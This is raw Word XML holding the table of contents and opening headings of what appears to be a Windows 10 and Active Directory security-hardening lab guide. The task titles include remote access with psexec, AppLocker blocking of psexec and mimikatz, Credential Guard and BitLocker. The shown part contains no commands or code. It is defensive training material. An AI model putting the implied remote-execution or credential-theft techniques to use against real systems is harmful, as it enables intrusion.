                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B3D8F65" w14:textId="3451A41E" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075685" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 7: Use psexec to remote access share</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075685 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="13B305B6" w14:textId="4486ABF7" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075686" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercise 2: Windows 10 hardening</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075686 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="55EEDFCC" w14:textId="7D5D9DDC" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075687" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1: BitLock the Windows system drive</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075687 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="480C764B" w14:textId="7CE45556" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075688" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2: Create group policy to enforce Credential Guard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075688 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2122E547" w14:textId="10A4029E" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075689" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3: Configure AppLocker to block psexec.exe and mimikatz.exe</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075689 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52C299F3" w14:textId="125B4233" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075690" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 4: Create group policy to enforce Windows Defender</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075690 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E98F238" w14:textId="5C700166" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075691" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 5: Use virtual smart card as MFA</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075691 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1C911A40" w14:textId="7A9B3223" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075692" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Exercise 3: Windows 10 hardening testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075692 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05A8BCCE" w14:textId="497A9343" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075693" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1: Boot from media</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075693 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="355FDD1D" w14:textId="210DE546" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075694" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 2: Connect using local administrator account created in Exercise 1 Task 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075694 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39B276CE" w14:textId="647DA222" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075695" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 3: Playing with Audit</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075695 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0E848B70" w14:textId="6D57E691" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075696" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 4: Configuring and testing Windows Defender Exploit Guard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075696 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DE60FEC" w14:textId="350EC93F" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:iCs w:val="0"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075697" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>After the Lab</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075697 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DFD881B" w14:textId="00478118" w:rsidR="00350AEE" w:rsidRDefault="00350AEE">
          <w:pPr>
            <w:pStyle w:val="TM4"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="fr-FR" w:eastAsia="fr-FR"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc44075698" w:history="1">
            <w:r w:rsidRPr="005303E0">
              <w:rPr>
                <w:rStyle w:val="Lienhypertexte"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Task 1: Stop and deallocated all the VMs</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc44075698 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A39BBE3" w14:textId="125B5691"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7621D5">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4" w:name="_Toc492638965"/>
      <w:bookmarkStart w:id="5" w:name="_Toc492640497"/>
      <w:bookmarkStart w:id="6" w:name="_Toc492640575"/>
      <w:bookmarkStart w:id="7" w:name="_Toc492652744"/>
      <w:bookmarkStart w:id="8" w:name="_Toc44075671"/>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8"/>
      <w:r w:rsidR="00A973CD" w:rsidRPr="00A973CD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE7E467" w14:textId="77777777" w:rsidR="00765A29" w:rsidRDefault="00765A29" w:rsidP="00765A29">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc44075672"/>
      <w:r>
        <w:t>Abstr</w:t>
      </w:r>
      <w:r w:rsidR="002A460B">
        <w:t>act and learning o</w:t>
      </w:r>
      <w:r>
        <w:t>bjectives</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>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8A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E1DE5" w14:textId="77777777" w:rsidR="00A973CD" w:rsidRPr="00F954C8" w:rsidRDefault="00A973CD" w:rsidP="00A973CD">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc44075673"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="50DE2715" w14:textId="77777777" w:rsidR="008A1AC1" w:rsidRDefault="008A1AC1" w:rsidP="008A1AC1">
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">In this </w:t>
      </w:r>
      <w:r>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidRPr="00877619">
        <w:t xml:space="preserve">, attendees will </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">implement several of the security features Windows, Active Directory and Azure Active Directory security. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F955B7" w14:textId="77777777" w:rsidR="008F2363" w:rsidRPr="00F954C8" w:rsidRDefault="008F2363" w:rsidP="008F2363">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc526233437"/>
      <w:bookmarkStart w:id="12" w:name="_Toc44075674"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:t>Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5E0DFF39" w14:textId="77777777" w:rsidR="00045EE1" w:rsidRDefault="00045EE1" w:rsidP="00045EE1">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
